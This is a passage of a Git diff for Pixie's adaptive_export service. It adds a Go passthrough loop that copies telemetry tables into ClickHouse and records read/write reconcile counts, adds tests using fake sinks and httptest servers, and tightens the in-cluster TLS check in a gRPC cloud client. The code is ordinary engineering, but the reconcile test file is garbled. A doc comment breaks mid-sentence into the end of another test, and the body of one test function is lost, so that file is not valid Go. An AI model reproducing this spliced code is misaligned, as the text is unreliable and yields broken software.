+ tmpl map[string]string
+}
+
+// New constructs a Loop. Caller-provided querier+sink must already be
+// wired (cmd/main.go builds both unconditionally when ADAPTIVE_PASSTHROUGH
+// is enabled).
+func New(q querier, s sink, cfg Config) *Loop {
+ if cfg.Window <= 0 {
+ cfg.Window = 30 * time.Second
+ }
+ if cfg.Refresh <= 0 {
+ cfg.Refresh = 30 * time.Second
+ }
+ if len(cfg.Tables) == 0 {
+ cfg.Tables = clickhouse.PixieTables()
+ }
+ // Drop tables that aren't materialised on this cluster (e.g.
+ // http2_messages.beta) so they don't error every tick.
+ cfg.Tables = filterExcluded(cfg.Tables)
+ if cfg.Rec == nil {
+ cfg.Rec = reconcile.Nop{}
+ }
+ l := &Loop{q: q, s: s, cfg: cfg}
+ if cfg.Compiled {
+ // Precompile each table's PxL once. The window is fixed for the
+ // lifetime of the loop, so only the per-tick time bounds vary.
+ l.tmpl = make(map[string]string, len(cfg.Tables))
+ for _, table := range cfg.Tables {
+ t, err := pxl.CompilePassthrough(table, cfg.Window)
+ if err != nil {
+ // A non-builtin table can't be compiled; skip it rather
+ // than fail construction (matches the per-table tolerance
+ // of the run loop).
+ log.WithError(err).WithField("table", table).
+ Warn("ADAPTIVE_PASSTHROUGH: precompile skipped")
+ continue
+ }
+ l.tmpl[table] = t
+ }
+ }
+ return l
+}
+
+// filterExcluded returns the entries of tables that are not listed in
+// excludedTables, in their original order. The result never shares a
+// backing array with the input (the zero-capacity reslice forces append to
+// allocate), so the caller's slice is left untouched.
+func filterExcluded(tables []string) []string {
+	kept := tables[:0:0]
+	for i := range tables {
+		if name := tables[i]; !excludedTables[name] {
+			kept = append(kept, name)
+		}
+	}
+	return kept
+}
+
+// rec hands one "passthrough"-mode reconciliation row to the configured
+// recorder (reconcile.Nop when New defaulted it, i.e. the instrument is
+// off). read and wrote are the row counts pulled from pixie and accepted by
+// the sink; errStr is the failure text, or "" on success.
+func (l *Loop) rec(ctx context.Context, table string, winStart, winEnd time.Time, read, wrote int, errStr string) {
+	row := reconcile.Row{
+		TS:         time.Now(),
+		Mode:       "passthrough",
+		Table:      table,
+		WinStart:   winStart,
+		WinEnd:     winEnd,
+		ReadCount:  int64(read),
+		WroteCount: int64(wrote),
+		WriteErr:   errStr,
+		Hostname:   l.cfg.Hostname,
+	}
+	l.cfg.Rec.Record(ctx, row)
+}
+
+// Run executes the firehose loop and returns only once ctx is cancelled.
+// One sweep runs immediately on entry, then one per Refresh interval. Each
+// sweep queries the configured tables for [now-Window, now) with no ns/pod
+// filter and writes whatever comes back. A failing table is logged and
+// skipped; it never terminates the loop, because passthrough is a
+// best-effort measurement workload rather than the durable write path.
+func (l *Loop) Run(ctx context.Context) {
+	startFields := log.Fields{
+		"window":  l.cfg.Window,
+		"refresh": l.cfg.Refresh,
+		"tables":  l.cfg.Tables,
+	}
+	log.WithFields(startFields).Info("ADAPTIVE_PASSTHROUGH: firehose loop starting")
+
+	// First sweep happens right away instead of after a full Refresh.
+	l.tick(ctx)
+
+	ticker := time.NewTicker(l.cfg.Refresh)
+	defer ticker.Stop()
+	done := ctx.Done()
+	for {
+		select {
+		case <-ticker.C:
+			l.tick(ctx)
+		case <-done:
+			log.Info("ADAPTIVE_PASSTHROUGH: firehose loop stopped")
+			return
+		}
+	}
+}
+
+// tick runs one passthrough sweep across every configured table. When
+// cfg.Compiled (the default) all tables are pulled CONCURRENTLY using the
+// precompiled templates; otherwise they are walked serially with QueryFor
+// rebuilt per tick (legacy path, kept for rollback via the env var).
+func (l *Loop) tick(ctx context.Context) {
+ now := time.Now()
+ sliceStart := now.Add(-l.cfg.Window)
+ sliceEnd := now
+
+ if l.cfg.Compiled {
+ l.tickConcurrent(ctx, sliceStart, sliceEnd)
+ return
+ }
+ for _, table := range l.cfg.Tables {
+ if ctx.Err() != nil {
+ return
+ }
+ // Empty Target: namespace+pod predicates are SKIPPED inside
+ // QueryFor, so the PxL DataFrame returns ALL rows in the window.
+ // This is the bypass that makes the A/B measurement meaningful.
+ src, err := pxl.QueryFor(table, anomaly.Target{}, sliceStart, sliceEnd, now)
+ if err != nil {
+ log.WithError(err).WithField("table", table).Warn("ADAPTIVE_PASSTHROUGH: QueryFor failed")
+ l.rec(ctx, table, sliceStart, sliceEnd, 0, 0, err.Error())
+ continue
+ }
+ l.pull(ctx, table, src, sliceStart, sliceEnd)
+ }
+}
+
+// tickConcurrent launches one goroutine per table that has a precompiled
+// template, each running pull for the given window, and returns once all of
+// them have finished. Tables without a template (skipped at precompile
+// time) are ignored, and no further goroutines are started once ctx is
+// done. Failures are handled inside pull, so one table cannot affect
+// another.
+func (l *Loop) tickConcurrent(ctx context.Context, sliceStart, sliceEnd time.Time) {
+	var pending sync.WaitGroup
+	for _, name := range l.cfg.Tables {
+		if ctx.Err() != nil {
+			break
+		}
+		compiled, found := l.tmpl[name]
+		if !found {
+			// Table was skipped at precompile time.
+			continue
+		}
+		query := pxl.Render(compiled, sliceStart, sliceEnd)
+		pending.Add(1)
+		go func(name, query string) {
+			defer pending.Done()
+			l.pull(ctx, name, query, sliceStart, sliceEnd)
+		}(name, query)
+	}
+	pending.Wait()
+}
+
+// pull runs one table's query, writes the rows, and records the reconcile
+// row. It is safe for concurrent use across distinct tables: the querier,
+// sink, and recorder are all pool/HTTP-backed and concurrency-safe, and
+// each call touches a different forensic_db.<table>.
+//
+// Exactly one reconcile row is emitted per call:
+//   - query error:  read=0, wrote=0, WriteErr=query error text
+//   - no rows:      read=0, wrote=0, WriteErr=""
+//   - write error:  read=len(rows), wrote=0, WriteErr=sink error text
+//   - success:      read=wrote=len(rows), WriteErr=""
+func (l *Loop) pull(ctx context.Context, table, src string, sliceStart, sliceEnd time.Time) {
+	// Bound this table's external query+write so a hung dependency can't
+	// stall the whole sweep or delay shutdown (CodeRabbit). Derived per-table
+	// from the parent ctx; covers both the serial and concurrent tick paths.
+	opCtx, cancel := context.WithTimeout(ctx, l.cfg.Refresh)
+	defer cancel()
+
+	// record emits the reconcile row under its OWN deadline, derived from the
+	// parent ctx rather than opCtx. If the query or write just burned the
+	// whole opCtx budget, opCtx is already expired, and a recorder that
+	// honours its context would drop the very row that documents the
+	// timeout. Deriving from the parent keeps the record bounded and still
+	// cancellable on shutdown.
+	record := func(read, wrote int, errStr string) {
+		recCtx, recCancel := context.WithTimeout(ctx, l.cfg.Refresh)
+		defer recCancel()
+		l.rec(recCtx, table, sliceStart, sliceEnd, read, wrote, errStr)
+	}
+
+	rows, err := l.q.Query(opCtx, src)
+	if err != nil {
+		log.WithError(err).WithField("table", table).Warn("ADAPTIVE_PASSTHROUGH: pixie query failed")
+		record(0, 0, err.Error())
+		return
+	}
+	if len(rows) == 0 {
+		log.WithField("table", table).Debug("ADAPTIVE_PASSTHROUGH: 0 rows")
+		record(0, 0, "")
+		return
+	}
+	if err := l.s.WritePixieRows(opCtx, table, rows); err != nil {
+		log.WithError(err).WithFields(log.Fields{
+			"table": table,
+			"rows":  len(rows),
+		}).Warn("ADAPTIVE_PASSTHROUGH: sink write failed")
+		record(len(rows), 0, err.Error())
+		return
+	}
+	log.WithFields(log.Fields{
+		"table": table,
+		"rows":  len(rows),
+	}).Info("ADAPTIVE_PASSTHROUGH: rows written")
+	record(len(rows), len(rows), "")
+}
diff --git a/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go b/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go
new file mode 100644
index 00000000000..e1653da02a8
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go
@@ -0,0 +1,230 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package passthrough
+
+import (
+ "context"
+ "errors"
+ "strings"
+ "sync"
+ "sync/atomic"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+)
+
+// fakeQuerier is a test querier that logs every PxL source it receives and
+// answers with either a fixed error or a single fixed row.
+type fakeQuerier struct {
+	mu    sync.Mutex
+	calls []string       // PxL sources received, in call order
+	row   map[string]any // the one row returned on success
+	err   error          // when non-nil, returned instead of row
+}
+
+// Query records src and then returns f.err if it is set, otherwise a
+// one-element result containing f.row.
+func (f *fakeQuerier) Query(_ context.Context, src string) ([]map[string]any, error) {
+	f.mu.Lock()
+	f.calls = append(f.calls, src)
+	f.mu.Unlock()
+
+	if f.err == nil {
+		return []map[string]any{f.row}, nil
+	}
+	return nil, f.err
+}
+
+// fakeSink is a test sink that tallies rows written per table and can be
+// told to reject writes for one specific table.
+type fakeSink struct {
+	mu      sync.Mutex
+	writes  map[string]int // table → row count
+	failFor string         // table whose writes are rejected ("" = none)
+}
+
+// newFakeSink returns a fakeSink with an initialised writes map.
+func newFakeSink() *fakeSink {
+	return &fakeSink{writes: make(map[string]int)}
+}
+
+// WritePixieRows fails for the table named by failFor and otherwise adds
+// len(rows) to that table's tally.
+func (f *fakeSink) WritePixieRows(_ context.Context, table string, rows []map[string]any) error {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	if table != f.failFor {
+		f.writes[table] += len(rows)
+		return nil
+	}
+	return errors.New("fakeSink: forced failure")
+}
+
+// TestLoop_DefaultsTablesToPixieTables checks that, with Config.Tables
+// unset, one tick writes every clickhouse.PixieTables() entry except those
+// in excludedTables (tables that aren't materialised on every cluster).
+// The A/B measurement relies on this: a missing table silently drops a
+// column from the capture-fraction matrix.
+func TestLoop_DefaultsTablesToPixieTables(t *testing.T) {
+	sinkFake := newFakeSink()
+	queryFake := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}}
+	loop := New(queryFake, sinkFake, Config{Window: 1 * time.Second, Refresh: 1 * time.Hour})
+
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	loop.tick(ctx)
+
+	expected := filterExcluded(clickhouse.PixieTables())
+	if written := len(sinkFake.writes); written != len(expected) {
+		t.Fatalf("wrote %d tables, want %d", written, len(expected))
+	}
+	for i := range expected {
+		name := expected[i]
+		if n := sinkFake.writes[name]; n != 1 {
+			t.Fatalf("table %q: wrote %d rows, want 1", name, n)
+		}
+	}
+	// None of the excluded tables may show up in the sink.
+	for name := range excludedTables {
+		n, present := sinkFake.writes[name]
+		if present {
+			t.Fatalf("excluded table %q was written %d times — exclusion list out of sync with passthrough.New", name, n)
+		}
+	}
+}
+
+// TestLoop_EmitsEmptyTargetPxL — the firehose semantics require the PxL
+// to omit the namespace/pod predicates entirely. The whole A/B
+// experiment is meaningful only if the EVERYTHING phase truly does NOT
+// filter rows.
+//
+// The test first asserts that at least one query was issued; otherwise the
+// predicate scan below would pass vacuously if the tick produced no PxL at
+// all.
+func TestLoop_EmitsEmptyTargetPxL(t *testing.T) {
+	q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}}
+	s := newFakeSink()
+	l := New(q, s, Config{Window: 1 * time.Second, Refresh: 1 * time.Hour})
+
+	l.tick(context.Background())
+
+	// Snapshot under the querier's mutex, matching how Query appends.
+	q.mu.Lock()
+	calls := append([]string(nil), q.calls...)
+	q.mu.Unlock()
+
+	if len(calls) == 0 {
+		t.Fatalf("tick issued no queries — predicate check would pass vacuously")
+	}
+	for _, src := range calls {
+		// pxl.QueryFor with empty Target writes neither "df.namespace ==" nor
+		// "df.pod ==" predicates. If either appears, the loop is silently
+		// filtering and the A/B comparison is invalid.
+		if strings.Contains(src, "df.namespace ==") {
+			t.Fatalf("passthrough PxL contains namespace filter — A/B invariant broken:\n%s", src)
+		}
+		if strings.Contains(src, "df.pod ==") {
+			t.Fatalf("passthrough PxL contains pod filter — A/B invariant broken:\n%s", src)
+		}
+	}
+}
+
+// TestLoop_TickContinuesPastTableFailure checks that a failure on one table
+// does not stop the remaining tables in the same tick from being written.
+// Without that, a transient error on http_events would silently drop
+// conn_stats, dns_events, etc. from the window. Here the failure is forced
+// at the sink for the first table.
+func TestLoop_TickContinuesPastTableFailure(t *testing.T) {
+	sinkFake := newFakeSink()
+	sinkFake.failFor = "http_events" // sink rejects the first table
+	queryFake := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}}
+	cfg := Config{
+		Window:  1 * time.Second,
+		Refresh: 1 * time.Hour,
+		Tables:  []string{"http_events", "conn_stats", "dns_events"},
+	}
+
+	New(queryFake, sinkFake, cfg).tick(context.Background())
+
+	if n := sinkFake.writes["http_events"]; n != 0 {
+		t.Fatalf("http_events should NOT have written: %d rows", n)
+	}
+	connRows, dnsRows := sinkFake.writes["conn_stats"], sinkFake.writes["dns_events"]
+	if !(connRows == 1 && dnsRows == 1) {
+		t.Fatalf("tables after the failure should still write: conn_stats=%d dns_events=%d",
+			connRows, dnsRows)
+	}
+}
+
+// TestLoop_RunFiresImmediately checks that Run performs its first sweep on
+// entry rather than after one Refresh. Otherwise a 30s default Refresh
+// would mix 30s of "AE-FILTER" baseline into the EVERYTHING phase's first
+// window when the operator boots into passthrough mode.
+func TestLoop_RunFiresImmediately(t *testing.T) {
+	sinkFake := newFakeSink()
+	queryFake := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}}
+	loop := New(queryFake, sinkFake, Config{
+		Window:  1 * time.Second,
+		Refresh: 1 * time.Hour, // ensure the test fails if we wait for the ticker
+		Tables:  []string{"http_events"},
+	})
+
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+
+	done := make(chan struct{})
+	go func() {
+		defer close(done)
+		loop.Run(ctx)
+	}()
+
+	// written reads the http_events tally under the sink's lock.
+	written := func() int {
+		sinkFake.mu.Lock()
+		defer sinkFake.mu.Unlock()
+		return sinkFake.writes["http_events"]
+	}
+
+	// Poll briefly — Run's immediate tick should land within ms.
+	deadline := time.After(2 * time.Second)
+	for got := written(); got != 1; got = written() {
+		select {
+		case <-deadline:
+			t.Fatalf("first tick did not fire within 2s; got %d writes", got)
+		case <-time.After(10 * time.Millisecond):
+		}
+	}
+	cancel()
+	<-done
+}
+
+// TestNew_AppliesDefaults — Window/Refresh = 0 fall back to 30s, Tables
+// = nil falls back to clickhouse.PixieTables() with excludedTables
+// stripped (see passthrough.go for the rationale). Production cmd/main.go
+// reads optional env knobs into Config; an unset env yields a zero
+// duration and we must not crash with a zero ticker.
+func TestNew_AppliesDefaults(t *testing.T) {
+ l := New(&fakeQuerier{}, newFakeSink(), Config{})
+ if l.cfg.Window != 30*time.Second {
+ t.Fatalf("default Window = %v, want 30s", l.cfg.Window)
+ }
+ if l.cfg.Refresh != 30*time.Second {
+ t.Fatalf("default Refresh = %v, want 30s", l.cfg.Refresh)
+ }
+ if got, want := len(l.cfg.Tables), len(filterExcluded(clickhouse.PixieTables())); got != want {
+ t.Fatalf("default Tables count = %d, want %d", got, want)
+ }
+}
+
+// TestLoop_RespectsContext checks that tick issues no queries at all when
+// its context is already cancelled (we don't want a 2-min stall on SIGTERM
+// when the loop has 13 tables × N-second pixie roundtrip queued up). The
+// context is cancelled before tick is called, and the serial path is the
+// one exercised because Compiled is left false.
+func TestLoop_RespectsContext(t *testing.T) {
+	var queries atomic.Int32
+	loop := New(&slowQuerier{calls: &queries}, newFakeSink(), Config{
+		Window:  1 * time.Second,
+		Refresh: 1 * time.Hour,
+		Tables:  []string{"a", "b", "c", "d", "e"},
+	})
+
+	ctx, cancel := context.WithCancel(context.Background())
+	cancel() // cancel before tick starts
+	loop.tick(ctx)
+
+	// Every table is skipped: ctx.Err() != nil at the top of the loop.
+	if n := queries.Load(); n != 0 {
+		t.Fatalf("expected 0 querier calls after cancel, got %d", n)
+	}
+}
+
+// slowQuerier is a test querier that only counts how often Query is called;
+// despite the name it returns immediately with no rows and no error.
+type slowQuerier struct {
+	calls *atomic.Int32
+}
+
+// Query increments the shared call counter and returns an empty result.
+func (q *slowQuerier) Query(_ context.Context, _ string) ([]map[string]any, error) {
+	q.calls.Add(1)
+	return nil, nil
+}
diff --git a/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go b/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go
new file mode 100644
index 00000000000..44a546e82b9
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go
@@ -0,0 +1,247 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package passthrough
+
+import (
+ "context"
+ "errors"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "sync/atomic"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
+ sinkpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+)
+
+// capRec is a test recorder that keeps every reconcile.Row it is given, in
+// arrival order, for later assertions. It does no locking of its own.
+type capRec struct {
+	rows []reconcile.Row
+}
+
+// Record appends r to the captured rows.
+func (c *capRec) Record(_ context.Context, r reconcile.Row) {
+	c.rows = append(c.rows, r)
+}
+
+// tableQuerier is a test querier that answers with a fixed number of rows
+// per pixie table. The table is recognised by the `table='X'` token that
+// QueryFor embeds in the PxL. A negative count makes the query itself fail
+// (to exercise the read-error branch); a source matching no configured
+// table yields no rows and no error.
+type tableQuerier struct {
+	n map[string]int
+}
+
+// Query returns count synthetic rows ({"time_": 0..count-1}) for the first
+// configured table whose token appears in src.
+func (q tableQuerier) Query(_ context.Context, src string) ([]map[string]any, error) {
+	for name, count := range q.n {
+		if !strings.Contains(src, "table='"+name+"'") {
+			continue
+		}
+		if count < 0 {
+			return nil, errors.New("boom")
+		}
+		out := make([]map[string]any, 0, count)
+		for i := 0; i < count; i++ {
+			out = append(out, map[string]any{"time_": int64(i)})
+		}
+		return out, nil
+	}
+	return nil, nil
+}
+
+// failSink is a test sink that rejects writes for every table flagged in
+// fail and accepts (and discards) all others.
+type failSink struct {
+	fail map[string]bool
+}
+
+// WritePixieRows returns an error when table is flagged in s.fail, and nil
+// otherwise.
+func (s failSink) WritePixieRows(_ context.Context, table string, _ []map[string]any) error {
+	if !s.fail[table] {
+		return nil
+	}
+	return errors.New("sink down")
+}
+
+// TestTick_ReconcileRecordsReadVsWrote is the scientific check of the
+// passthrough write-fidelity instrument: for every table pulled in a tick,
+// exactly one reconcile.Row must be emitted, and its (ReadCount, WroteCount)
+// must reflect the actual read/write outcome — the basis for localizing
+// loss to query (readwrote — the exact shape a sink-drop bug
+ // produces, which a count-only check would miss.
+ if r := got["conn_stats"]; r[0] <= r[1] {
+ t.Errorf("conn_stats read(%d) must exceed wrote(%d) on sink failure", r[0], r[1])
+ }
+}
+
+// TestNew_DefaultsRecorderToNop checks that a Loop built without a Recorder
+// can run a tick without panicking, i.e. the instrument stays off unless
+// explicitly wired.
+func TestNew_DefaultsRecorderToNop(t *testing.T) {
+	querier := tableQuerier{n: map[string]int{"http_events": 1}}
+	cfg := Config{Window: time.Second, Tables: []string{"http_events"}}
+	// Rec is deliberately left unset; tick must not panic.
+	New(querier, failSink{}, cfg).tick(context.Background())
+}
+
+// TestTick_ReconcileCatchesCHSilentDrop is the production-meaningful
+// counterpart to TestTick_ReconcileRecordsReadVsWrote. Instead of an
+// in-process fake it uses a real sink.ClickHouseHTTP pointed at an httptest
+// server that mimics CH's silent-drop shape: 200 OK with
+// X-ClickHouse-Summary reporting written_rows=0. The loop must treat that
+// as a write error (sink.summaryWroteFewerThan returns non-nil) and record
+// ReadCount=N, WroteCount=0. This is the EXACT regression an R6
+// (sink-layer loss) reconcile run has to detect; the fake-sink test proves
+// the wiring, this one proves the chain end-to-end.
+func TestTick_ReconcileCatchesCHSilentDrop(t *testing.T) {
+	const (
+		table = "http_events"
+		nRows = 5
+	)
+
+	// posts counts sink requests: one tick × one table should be one POST.
+	var posts atomic.Int32
+	silentDrop := func(w http.ResponseWriter, _ *http.Request) {
+		posts.Add(1)
+		// 200 OK whose summary claims "0 rows written" despite a non-empty
+		// body; AE's sink converts this into a Go error.
+		w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"0"}`)
+		w.WriteHeader(http.StatusOK)
+	}
+	ch := httptest.NewServer(http.HandlerFunc(silentDrop))
+	defer ch.Close()
+
+	chSink, err := sinkpkg.New(sinkpkg.Config{Endpoint: ch.URL, Database: "forensic_db"})
+	if err != nil {
+		t.Fatalf("sink.New: %v", err)
+	}
+
+	captured := &capRec{}
+	cfg := Config{
+		Window:   60 * time.Second,
+		Tables:   []string{table},
+		Rec:      captured,
+		Hostname: "node-test",
+	}
+	New(tableQuerier{n: map[string]int{table: nRows}}, chSink, cfg).
+		tick(context.Background())
+
+	if n := posts.Load(); n != 1 {
+		t.Fatalf("CH endpoint hit %d times, want 1", n)
+	}
+	if n := len(captured.rows); n != 1 {
+		t.Fatalf("recorded %d reconcile rows, want 1", n)
+	}
+
+	got := captured.rows[0]
+	switch {
+	case got.Table != table:
+		t.Fatalf("Table=%q want %q", got.Table, table)
+	case got.ReadCount != int64(nRows):
+		t.Fatalf("ReadCount=%d, want %d (read from querier)", got.ReadCount, nRows)
+	case got.WroteCount != 0:
+		t.Fatalf("WroteCount=%d, want 0 (CH silent-drop must land here, not at %d)", got.WroteCount, nRows)
+	}
+	attributed := strings.Contains(got.WriteErr, "silent drop") ||
+		strings.Contains(got.WriteErr, "written_rows")
+	if !attributed {
+		t.Fatalf("WriteErr=%q, want CH silent-drop attribution", got.WriteErr)
+	}
+}
+
+// TestTick_ReconcileAttributesCHFailureCorrectly is the dual of the
+// silent-drop test: when CH answers with a real 5xx, the loop must record
+// the same (read=N, wrote=0) shape, only with a different WriteErr. This
+// shows the read-count vs wrote-count split does not depend on the kind of
+// sink error (for R6 attribution it's the COUNT that matters, not the
+// specific failure mode).
+func TestTick_ReconcileAttributesCHFailureCorrectly(t *testing.T) {
+	const (
+		table = "dns_events"
+		nRows = 7
+	)
+
+	serverError := func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusInternalServerError)
+		_, _ = w.Write([]byte("Memory limit exceeded"))
+	}
+	ch := httptest.NewServer(http.HandlerFunc(serverError))
+	defer ch.Close()
+
+	chSink, err := sinkpkg.New(sinkpkg.Config{Endpoint: ch.URL, Database: "forensic_db"})
+	if err != nil {
+		t.Fatalf("sink.New: %v", err)
+	}
+
+	captured := &capRec{}
+	cfg := Config{
+		Window:   60 * time.Second,
+		Tables:   []string{table},
+		Rec:      captured,
+		Hostname: "node-test",
+	}
+	New(tableQuerier{n: map[string]int{table: nRows}}, chSink, cfg).
+		tick(context.Background())
+
+	if n := len(captured.rows); n != 1 {
+		t.Fatalf("recorded %d reconcile rows, want 1", n)
+	}
+	got := captured.rows[0]
+	if !(got.ReadCount == int64(nRows) && got.WroteCount == 0) {
+		t.Fatalf("got (read,wrote)=(%d,%d) want (%d,0)", got.ReadCount, got.WroteCount, nRows)
+	}
+	attributed := strings.Contains(got.WriteErr, "500") ||
+		strings.Contains(got.WriteErr, "Memory")
+	if !attributed {
+		t.Fatalf("WriteErr=%q, want 500/Memory attribution", got.WriteErr)
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/pixie/pixie.go b/src/vizier/services/adaptive_export/internal/pixie/pixie.go
index feb8cadd698..e62c2a323d1 100644
--- a/src/vizier/services/adaptive_export/internal/pixie/pixie.go
+++ b/src/vizier/services/adaptive_export/internal/pixie/pixie.go
@@ -14,12 +14,18 @@
//
// SPDX-License-Identifier: Apache-2.0
+// Package pixie is a thin gRPC wrapper around Pixie cloud's
+// PluginService — used by adaptive_export at boot only, to ensure the
+// ClickHouse retention plugin is enabled. Retention scripts themselves
+// (the PxL that Pixie runs to populate the forensic_db.* tables) are
+// user-defined via the Pixie UI; this package does NOT manage them.
package pixie
import (
"context"
"crypto/tls"
"fmt"
+ "net"
"strings"
"github.com/gogo/protobuf/types"
@@ -38,6 +44,7 @@ const (
exportURLConfig = "exportURL"
)
+// Client wraps a gRPC connection to Pixie cloud's PluginService.
type Client struct {
cloudAddr string
ctx context.Context
@@ -46,43 +53,72 @@ type Client struct {
pluginClient cloudpb.PluginServiceClient
}
+// NewClient dials the Pixie cloud and authenticates with apiKey via
+// the per-call metadata header.
+//
+// Auth choice — why API key here, not a service JWT.
+// Two different gRPC perimeters are talked to from AE:
+// 1. This package (pixie.Client) targets the Pixie CLOUD (cloudpb's
+// PluginService): enabling the ClickHouse retention plugin, syncing
+// preset retention scripts. The cloud's auth interceptor accepts the
+// `pixie-api-key` header for external clients and resolves it to an
+// org. JWT service tokens minted with PL_JWT_SIGNING_KEY are only
+// trusted by INSIDE-cluster vizier services (kelvin, metadata,
+// query_broker); cloud rejects them. See
+// src/cloud/api/controllers/auth_grpc.go:62 for the cloud-side
+// "pixie-api-key" handler and src/api/go/pxapi/client.go:117 for
+// pixie's own SDK using the same header.
+// 2. pixieapi.Adapter (internal/pixieapi) targets vizier DIRECTLY
+// (vizierpb.VizierService at query-broker / PEM direct-query) and
+// correctly uses JWT via jwtutils.GenerateJWTForService — the same
+// pattern as cloud_connector/vizhealth/checker.go:111 and
+// query_broker/script_runner/script_runner.go:248.
+//
+// So: this NewClient must take an API key; flipping it to JWT would
+// break cloud auth, not improve it.
func NewClient(ctx context.Context, apiKey string, cloudAddr string) (*Client, error) {
if apiKey == "" {
- fmt.Println("WARNING: API key is empty!")
+ return nil, fmt.Errorf("pixie: empty API key")
}
-
c := &Client{
cloudAddr: cloudAddr,
ctx: metadata.AppendToOutgoingContext(ctx, "pixie-api-key", apiKey),
}
-
if err := c.init(); err != nil {
return nil, err
}
-
return c, nil
}
func (c *Client) init() error {
- isInternal := strings.ContainsAny(c.cloudAddr, "cluster.local")
-
- tlsConfig := &tls.Config{InsecureSkipVerify: isInternal}
+ host := c.cloudAddr
+ if h, _, err := net.SplitHostPort(c.cloudAddr); err == nil {
+ host = h
+ }
+ isInternal := host == "cluster.local" || strings.HasSuffix(host, ".cluster.local")
+ tlsConfig := &tls.Config{
+ InsecureSkipVerify: isInternal, //nolint:gosec // in-cluster vizier traffic only
+ MinVersion: tls.VersionTLS12,
+ }
creds := credentials.NewTLS(tlsConfig)
-
conn, err := grpc.Dial(c.cloudAddr, grpc.WithTransportCredentials(creds))
if err != nil {
return err
}
-
c.grpcConn = conn
c.pluginClient = cloudpb.NewPluginServiceClient(conn)
return nil
}
+// ClickHousePluginConfig is the minimal config the ensure-on path needs.
+type ClickHousePluginConfig struct {
+ ExportURL string
+}
+
+// GetClickHousePlugin returns the ClickHouse retention plugin descriptor,
+// or an error if it is not registered with the cloud.
func (c *Client) GetClickHousePlugin() (*cloudpb.Plugin, error) {
- req := &cloudpb.GetPluginsRequest{
- Kind: cloudpb.PK_RETENTION,
- }
+ req := &cloudpb.GetPluginsRequest{Kind: cloudpb.PK_RETENTION}
resp, err := c.pluginClient.GetPlugins(c.ctx, req)
if err != nil {
return nil, err
@@ -92,44 +128,35 @@ func (c *Client) GetClickHousePlugin() (*cloudpb.Plugin, error) {
return plugin, nil
}
}
- return nil, fmt.Errorf("the %s plugin could not be found", clickhousePluginID)
-}
-
-type ClickHousePluginConfig struct {
- ExportURL string
+ return nil, fmt.Errorf("pixie: %s plugin not found", clickhousePluginID)
}
+// GetClickHousePluginConfig returns the current org-level config (the
+// ExportURL the retention plugin is currently writing to), falling back
+// to the plugin's default if no custom URL is set.
func (c *Client) GetClickHousePluginConfig() (*ClickHousePluginConfig, error) {
- req := &cloudpb.GetOrgRetentionPluginConfigRequest{
- PluginId: clickhousePluginID,
- }
+ req := &cloudpb.GetOrgRetentionPluginConfigRequest{PluginId: clickhousePluginID}
resp, err := c.pluginClient.GetOrgRetentionPluginConfig(c.ctx, req)
if err != nil {
return nil, err
}
exportURL := resp.CustomExportUrl
if exportURL == "" {
- exportURL, err = c.getDefaultClickHouseExportURL()
+ info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx,
+ &cloudpb.GetRetentionPluginInfoRequest{PluginId: clickhousePluginID})
if err != nil {
return nil, err
}
+ exportURL = info.DefaultExportURL
}
- return &ClickHousePluginConfig{
- ExportURL: exportURL,
- }, nil
-}
-
-func (c *Client) getDefaultClickHouseExportURL() (string, error) {
- req := &cloudpb.GetRetentionPluginInfoRequest{
- PluginId: clickhousePluginID,
- }
- info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx, req)
- if err != nil {
- return "", err
- }
- return info.DefaultExportURL, nil
+ return &ClickHousePluginConfig{ExportURL: exportURL}, nil
}
+// EnableClickHousePlugin turns the plugin on with the supplied
+// ExportURL. Idempotent on the cloud side: calling Enable when already
+// enabled re-applies the same config without effect. DisablePresets is
+// true so existing user-defined retention scripts (the source of truth
+// for what gets written) are not overwritten by Pixie's preset set.
func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version string) error {
req := &cloudpb.UpdateRetentionPluginConfigRequest{
PluginId: clickhousePluginID,
@@ -146,36 +173,12 @@ func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version
return err
}
-// DisableClickHousePlugin flips the retention plugin off without touching scripts.
